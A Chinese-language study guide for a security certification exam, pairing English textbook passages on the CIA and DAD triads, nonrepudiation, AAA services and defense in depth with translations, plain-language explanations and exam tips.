场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书、签名、强认证常支持真实性。

认证成功不等于什么都能做;权限仍要单独授权。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
授权 授权是认证之后决定你能访问什么、能做什么。
问责性 问责性要求能把行为绑定到具体主体。
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 08 / PDF P85

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

controls effectively, monitoring performance and network traffic, using firewalls and routers to prevent DoS attacks, implementing redundancy for critical systems, and maintaining and testing backup systems. Most security policies, as well as business continuity planning (BCP), focus on the use of fault tolerance features at the various levels of access/storage/security (that is, disk, server, or site) with the goal of eliminating single points of failure to maintain the availability of critical systems. Availability depends on both integrity and confidentiality. Without integrity and confidentiality, availability cannot be maintained.

Concepts, conditions, and aspects of availability include the following: Usability: The state of being easy to use or learn or being able to be understood and controlled by a subject Accessibility: The assurance that the widest range of subjects can interact with a resource regardless of their capabilities or limitations Timeliness: Being prompt, on time, within a reasonable time frame, or providing a low-latency response DAD, Overprotection, Authenticity, Nonrepudiation, and AAA Services In addition to the CIA Triad, you need to consider a plethora of other security-related concepts and principles when designing a security policy and deploying a security solution.

These include the DAD Triad, the risks of overprotection, authenticity, nonrepudiation, and AAA services. One interesting security concept is the opposite of the CIA Triad, which is the DAD Triad. Disclosure, alteration, and destruction make up the DAD Triad. The DAD Triad represents the failures of security protections in the CIA Triad. It may be useful to recognize what to look for when a security mechanism fails. Disclosure occurs when sensitive or confidential material is accessed by unauthorized entities. It is a violation of confidentiality. Alteration occurs when data is either maliciously or accidentally changed. It is a violation of integrity.

Destruction occurs when a resource is damaged or made inaccessible to authorized users (technically, we usually call the latter denial of service [DoS]). Destruction is a violation of availability. It may also be worthwhile to know that too much security can be its own problem. Overprotecting confidentiality can result in a restriction of

中文直译 / 整理

控制、监控性能和网络流量、使用防火墙和路由器防止拒绝服务攻击、为关键 系统实施冗余,以及维护和测试备份系统。 大多数安全策略以及业务连续性计 划(BCP)都侧重于在各级访问/存储/安全(即磁盘、服务器或站点)上使用 容错功能,以消除单点故障,确保关键系统的可用性。 可用性取决于完整性和机密性。 没有完整性和机密性,就无法维持可用性。 可用性的概念、条件和方面包括以下内容: 可用性相关概念:易用性或学习,或能够被主体理解和控制的状态 可访问性:确保最广泛的主体无论其能力或限制如何,都能与资源交互 及时性:及时、准时、在合理的时间范围内,或提供低延迟响应 DAD、过度保护、真实性、不可否认性性及AAA服务 除了CIA三元组之外,在设计安全策略和部署安全解决方案时,您还需要考虑 大量其他与安全相关的概念和原则。 这些包括DAD三元组、过度保护的风险、 真实性、不可否认性性以及AAA服务。 一个有趣的安全概念是CIA三元组的对立面,即DAD三元组。 披露、篡改和破 坏构成了DAD三元组。 DAD三元组代表了CIA三元组中安全保护的失效。 识别 安全机制失效时应关注的问题可能很有帮助。

当敏感或机密信息被未经授权的 实体访问时,就会发生披露。 y 未经授权的实体。 这是对机密性的违反。 y. 当数据被恶意或意外更改时,就会发生篡改。 这是对完整性的违反。 当资源被 损坏或对授权用户不可访问时,就会发生破坏(从技术上讲,我们通常将后者 称为拒绝服务[DoS])。 破坏是对可用性的违反。 了解过多的安全措施也可能成为自身的问题是有价值的。 过度保护机密性可能 导致可用性受限

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

把事故翻译成 DAD,再反推破坏了 CIA 哪一项。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
DAD 三元组 DAD 是 CIA 的反面:披露、篡改、破坏。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
学习单元 09 / PDF P86

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

availability. Overprotecting integrity can result in a restriction of availability. Overproviding availability can result in a loss of confidentiality and integrity. Authenticity is the security concept that data is authentic or genuine and originates from its alleged source. This is related to integrity but more closely related to verifying that it is from a claimed origin. When data has authenticity, the recipient can have a high level of confidence that the data is from whom it claims to be and did not change in transit (or storage). Nonrepudiation ensures that the subject of an activity or who caused an event cannot deny that the event occurred.

Nonrepudiation prevents a subject from claiming not to have sent a message, not to have performed an action, or not to have been the cause of an event. It is made possible through identification, authentication, authorization, auditing, and accounting. Nonrepudiation can be established using digital certificates, session identifiers, transaction logs, and numerous other transactional and access control mechanisms. A system built without proper enforcement of nonrepudiation does not provide verification that a specific entity performed a certain action. Nonrepudiation is an essential part of accounting. A suspect cannot be held accountable if they can repudiate the claim against them.

AAA services are a core security mechanism of all security environments. The three As in this abbreviation refer to authentication, authorization, and accounting (or sometimes auditing). However, what is not as clear is that although there are three letters in the acronym, it actually refers to five elements: identification, authentication, authorization, auditing, and accounting. These five elements represent the following processes of security: Identification Identification is claiming to be an identity when attempting to access a secured area or system. Authentication Authentication is proving that you are that claimed identity.

Authorization Authorization defines the permissions (i.e., allow/grant and/or deny) of a resource and object access for a specific identity or subject. Auditing Auditing is recording a log of the events and activities related to the system and subjects. Accounting Accounting (aka accountability) is reviewing log files to check for compliance and violations in order to hold subjects accountable

中文直译 / 整理

可用性。 过度保护完整性可能导致可用性受限。 过度提供可用性可能导致机密性 和完整性丧失。 真实性是一种安全概念,指数据是真实或原始的,并且源自其声称的来源。 这 与完整性相关,但更侧重于验证数据是否来自所声称的源头。 当数据具有真实 性时,接收方可以高度确信数据确实来自其声称的发送方,且在传输(或存储) 过程中未被篡改。 不可否认性性确保活动的主体或导致事件发生的主体无法否认该事件的发生。 不 可否认性防止主体声称未发送消息、未执行操作或未引发事件。 它通过身份识 别、身份验证、授权、审计和记账得以实现。 不可否认性性可通过数字证书、会 话标识符、交易日志以及众多其他交易和访问控制机制建立。 若系统未正确强 制执行不可否认性性,则无法验证特定实体是否执行了某项操作。 不可否认性性是 记账的关键组成部分。 如果嫌疑人能够否认针对他们的指控,则无法追究其责 任。 AAA服务是所有安全环境的核心安全机制。 该缩写中的三个A分别指身份验证、 授权和计费(有时也指审计)。 然而,不太清楚的是,尽管该缩写包含三个字 母,但它实际上指的是五个要素:标识、身份验证、授权、审计和计费。

这五 个要素代表了以下安全过程: 标识 标识是在尝试访问受保护区域或系统时声明自己身份的行为。 身份验证 身份验证是证明自己就是所声明的身份。 授权 授权定义了特定身份或主体对资源和对象访问的权限(即允许/授予 和/或拒绝)。 审计 审计是记录与系统和主体相关的事件和活动日志。 会计 会计(又称 问责)是通过审查日志文件来检查合规性与违规行为,以确 保主体对其行为负责

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书、签名、强认证常支持真实性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
学习单元 10 / PDF P87

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

for their actions, especially violations of organizational security policy. Although AAA is typically referenced in relation to authentication systems, it is actually a foundational concept for security. Missing any of these five elements can result in an incomplete security mechanism. The following sections discuss identification, authentication, authorization, auditing, and accounting (see Figure 1.2). FIGURE 1.2 The five elements of AAA services Identification A subject must perform identification to start the process of authentication, authorization, and accounting (AAA).

Providing an identity can involve typing in a username; swiping a smartcard; waving a proximity device; speaking a phrase; or positioning your face, hand, or finger for a camera or scanning device. Without an identity, a system has no way to correlate an authentication factor with the subject. Once a subject has been identified (that is, once the subject's identity has been recognized and verified), the identity is accountable for any further actions by that subject. IT systems track activity by identities, not by the subjects themselves. A computer doesn't know one individual from another, but it does know that your user account is different from all other user accounts.

Simply claiming an identity does not imply access, authorization, or authority. The identity must be proven before use is allowed or access is granted. That process is authentication.

中文直译 / 整理

尤其是违反组织安全政策的行为。 尽管AAA通常与认证系统相关联,但它实际上是安全性的基础概念。 缺少这五 个要素中的任何一个,都会导致安全机制不完整。 以下章节将讨论标识、认证、 授权、审计和计费(见图1.2)。 图1.2 AAA服务的五个要素 标识 主体必须执行标识,以启动认证、授权和计费(AAA)过程。 提供身份可以包 括输入用户名、刷智能卡、挥动近距设备、说出短语,或将面部、手或手指置 于摄像头或扫描设备前。 没有身份,系统就无法将认证因素与主体关联起来。 一旦某个主体被识别(即主体的身份已被识别和验证),该身份将对其后续的 所有行为负责。 IT系统通过身份来跟踪活动,而非通过主体本身。 计算机无法 区分不同的个人,但它知道您的用户账户与其他所有用户账户不同。 仅仅声称 一个身份并不意味着拥有访问权限、授权或权威。 在允许使用或授予访问权限 之前,必须证明该身份。 这个过程就是身份验证。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 11 / PDF P88

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Authentication The process of verifying whether a claimed identity is valid is authentication. Authentication requires the subject to provide additional information that corresponds to the identity they are claiming. The most common form of authentication is using a password. Authentication verifies the identity of the subject by comparing one or more factors against the database of valid identities (that is, user accounts). The capability of the subject and system to maintain the secrecy of the authentication factors for identities directly reflects the level of security of that system. Identification and authentication are often used together as a single two-step process.

Providing an identity is the first step, and providing the authentication factors is the second step. Without both, a subject cannot gain access to a system—neither element alone is useful in terms of security. In some systems, it may seem as if you are providing only one element but gaining access, such as when keying in an ID code or a PIN. However, in these cases, either the identification is handled by another means, such as physical location, or authentication is assumed by your ability to access the system physically. Both identification and authentication take place, but you might not be as aware of them as when you manually type in both a username and a password.

Each authentication technique or factor has its unique benefits and drawbacks. Thus, it is important to evaluate each mechanism in light of the environment in which it will be deployed to determine viability. We discuss authentication at length in Chapter 13, “Managing Identity and Authentication.” Authorization Once a subject is authenticated, access must be authorized. The process of authorization ensures that the requested activity or access to an object is possible, given the rights and privileges assigned to the authenticated identity. In most cases, the system evaluates the subject, the object, and the assigned permissions related to the intended activity.

If the specific action is allowed, the subject is authorized. If the specific action is not allowed, the subject is not authorized. Keep in mind that just because a subject has been identified and authenticated does not mean they have been authorized to perform any function or access all resources within the controlled environment.

中文直译 / 整理

身份验证 验证所声称的身份是否有效的过程称为身份验证。 身份验证要求主体提供与所 声称身份相对应的附加信息。 最常见的身份验证形式是使用密码。 身份验证通 过将一个或多个因素与有效身份(即用户账户)数据库进行比对,来验证主体 的身份。 主体和系统维护身份验证因素机密性的能力,直接反映了该系统的安 全级别。 身份识别和身份验证通常被一起用作一个两步过程。 提供身份是第一步,提供 身份验证因素是第二步。 没有两者,主体就无法访问系统——单独任何一个元素 在安全性上都无用。 在某些系统中,您可能看似只提供了一个元素便获得了访 问权限,例如输入ID代码或PIN时。 然而,在这些情况下,要么身份识别是通 过其他方式完成的,例如物理位置,要么您的物理访问能力已默认被视为身份 验证。 身份识别和身份验证都发生了,但您可能不像手动输入用户名和密码时 那样明显意识到它们的存在。 每种身份验证技术或因素都有其独特的优点和缺点。 因此,重要的是根据其 部署环境评估每种机制的可行性。 我们在第13章“管理身份和身份验证”中 详细讨论了身份验证。 授权 一旦主体通过身份验证,就必须对其进行授权。

授权过程确保在给定已分配给 已验证身份的权利和权限的情况下,所请求的活动或对对象的访问是可能的。 在大多数情况下,系统会评估主体、对象以及与预期活动相关的已分配权限。 如果允许执行特定操作,则授权该主体; 如果禁止执行特定操作,则不授权该 主体。 请记住,即使某个主体已被识别和认证,也不意味着其已被授权在受控 环境中执行任何功能或访问所有资源。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
学习单元 12 / PDF P89

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Identification and authentication are all-or-nothing aspects of access control. Authorization has a wide range of variations between all or nothing for each object within the environment. A user may be able to read a file but not delete it, print a document but not alter the print queue, or log on to a system but not access any resources. Authorization is discussed in Chapter 13. Auditing Auditing is the programmatic means by which a subject's actions are tracked and recorded to hold the subject accountable for their actions while authenticated on a system through the documentation or recording of subject activities.

It is also the process of detecting unauthorized or abnormal activities on a system. Auditing is recording the activities of a subject and its objects and the activities of application and system functions. Log files provide an audit trail for re-creating the history of an event, intrusion, or system failure. Auditing is needed to detect malicious actions by subjects, attempted intrusions, and system failures. Auditing is also necessary to reconstruct timelines of compromise events, provide evidence for prosecution, and produce problem reports and analyses. Auditing is usually a native feature of operating systems and most applications and services.

Thus, configuring the system to record information about specific types of events is fairly straightforward. Monitoring is part of what is needed for audits, and audit logs are part of a monitoring system, but the two terms have different meanings. Monitoring is a type of watching or oversight, whereas auditing is recording the information into a record or file. It is possible to monitor without auditing, but you can't audit without some form of monitoring. Accounting An organization's security policy can be properly enforced only if accounting is maintained. In other words, you can maintain security only if subjects are held accountable for their actions.

Effective accounting relies on the capability to prove a subject's identity and track their activities. Accountability is established by linking an individual to the activities of an online identity through the security services and mechanisms of auditing, authorization,

中文直译 / 整理

识别和认证是访问控制的全有或全无特性。 授权在环境中的每个对象上都有从 全有到全无的广泛变化。 用户可能能够读取文件但不能删除它,打印文档但不 能更改打印队列,或登录系统但不能访问任何资源。 授权将在第13章中讨论。 审计 审计是通过记录和文档化主体在系统上经过身份验证期间的行为,以编程方式 跟踪并记录主体行为,从而使其对自身行为负责的过程。 它同时也是检测系统 上未经授权或异常活动的过程。 审计记录主体及其对象的活动,以及应用程序 和系统功能的活动。 日志文件提供了用于重现事件、入侵或系统故障历史的审 计追踪。 审计用于检测主体的恶意行为、尝试入侵和系统故障。 审计还用于重 建安全事件的时间线、提供起诉证据,以及生成问题报告和分析。 审计通常是 操作系统以及大多数应用程序和服务的内置功能。 因此,配置系统以记录特定 类型事件的信息相当简单。 监控是审计所需的一部分,审计日志也是监控系统的一部分,但这两 个术语具有不同的含义。 监控是一种观察或监督行为,而审计则是将信息 记录到日志或文件中。 可以不进行审计而实施监控,但如果没有某种形式 的监控,则无法进行审计。

会计 只有在保持审计记录的情况下,组织的安全策略才能得到妥善执行。 换句话说, 只有当主体对其行为负责时,才能维持安全。 有效的审计依赖于证明主体身份 并追踪其活动的能力。 通过审计、授权和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 13 / PDF P90

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

authentication, and identification. Thus, individual accountability is ultimately dependent on the strength of these processes. Without a strong authentication process, there is doubt that the person associated with a specific user account was the actual entity controlling that user account when the undesired action took place. To have viable accountability, you must be able to support your security decisions and their implementation in a court of law. If you are unable to legally support your security efforts, then you will be unlikely to be able to hold an individual accountable for actions linked to a user account.

With only a password as authentication, there is significant room for doubt. Passwords are the least secure form of authentication, with dozens of different methods available to compromise them. However, with the use of multifactor authentication (MFA), such as a password, smartcard, and fingerprint scan in combination, there is very little possibility that any other individual could have compromised the authentication process in order to impersonate the person responsible for the user account. Protection Mechanisms Another aspect of understanding and applying security controls is the concept of protection mechanisms or protection controls.

Not all security controls must have them, but many controls offer their protection through the use of these mechanisms. Some common examples of these mechanisms are defense in depth, abstraction, data hiding, and using encryption. Defense in Depth Defense in depth, also known as layering, is the use of multiple controls in a series. No one control can protect against all possible threats. Using a multilayered solution allows for numerous different controls to guard against whatever threats come to pass. When security solutions are designed in layers, a single failed control should not result in the exposure of systems or data. Using layers in a series rather than in parallel is important.

Performing security restrictions in a series means linearly enforcing one after the other. Only through a series configuration will each attack be scanned, evaluated, or mitigated by every security control. In a series configuration, failure of a single security control does not render the entire solution ineffective. If

中文直译 / 整理

身份验证以及身份识别的安全服务与机制,将个人与在线身份的活动关联起来, 从而建立责任归属。 因此,个人责任最终取决于这些过程的强度。 如果没有强 大的身份验证机制,就无法确定在不良行为发生时,与特定用户账户关联的人 员是否确实是该账户的实际控制者。 要实现可行的问责制,您必须能够在法庭上支持您的安全决策及其实施。 如果 您无法在法律上支持您的安全措施,则您将难以对与用户账户相关的操作追究 个人责任。 仅使用密码作为身份验证方式,存在很大的疑点。 密码是最不安全 的身份验证形式,有数十种不同的方法可以使其被攻破。 然而,通过使用多因 素身份验证(MFA),例如将密码、智能卡和指纹扫描结合使用,其他任何人 几乎不可能通过破坏身份验证过程来冒充该用户账户的负责人。 保护机制 理解和应用安全控制的另一个方面是保护机制或保护控制的概念。 并非所有安 全控制都必须具备这些机制,但许多控制措施正是通过这些机制提供保护的。 这些机制的一些常见示例包括纵深防御、抽象、数据隐藏和使用加密。 纵深防御 纵深防御,也称为分层,是指串联使用多种控制措施。 没有任何一种控制措施 能够防范所有可能的威胁。

采用多层解决方案可以运用多种不同的控制措施来 应对各种可能出现的威胁。 当安全解决方案采用分层设计时,单个控制措施的 失效不应导致系统或数据泄露。 使用串联而非并联的层至关重要。 以串联方式实施安全限制意味着线性地逐个 强制执行。 只有通过串联配置,每个攻击才会被每个安全控制措施扫描、评估 或缓解。 在串联配置中,单个安全控制措施的失效不会使整个解决方案失效。 如果

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

问责性:问责性要求能把行为绑定到具体主体。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

分层:分层把控制按层排列,让攻击者必须连续突破。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

问责依赖识别、认证、授权、审计和记账共同工作。

多层控制串联、避免单点失败,就是 defense in depth。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

对象、角色、组、接口都可能体现 abstraction。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
问责性 问责性要求能把行为绑定到具体主体。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
分层 分层把控制按层排列,让攻击者必须连续突破。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
数据隐藏 数据隐藏减少不必要暴露,但不等于加密。
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
学习单元 14 / PDF P91

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

security controls were implemented in parallel, a threat could pass through a single checkpoint that did not address its particular malicious activity. Serial configurations are very narrow but deep, whereas parallel configurations are very wide but shallow. Parallel systems are useful in distributed computing applications, but parallelism is not often a useful concept in the realm of security. Within the context of defense in depth, the terms levels, multilevel, and layers are often used. Additionally, there are numerous other terms that also relate to this concept, including classifications, zones, realms, compartments, silos, segmentations, lattice structures, and protection rings.

You will see these terms used often throughout this book. When you see them, think about the concept of defense in depth in relation to the context of where the term is used. Defense in breadth or diversity of defense is also an important related concept to defense in depth. It can be problematic if elements of several security layers are from the same vendor or share common code, since a vulnerability could affect numerous layers simultaneously. Using a range of security products from varied vendors significantly reduces or avoids the risk of a single exploit compromising several layers at once. Abstraction Abstraction is used for efficiency.

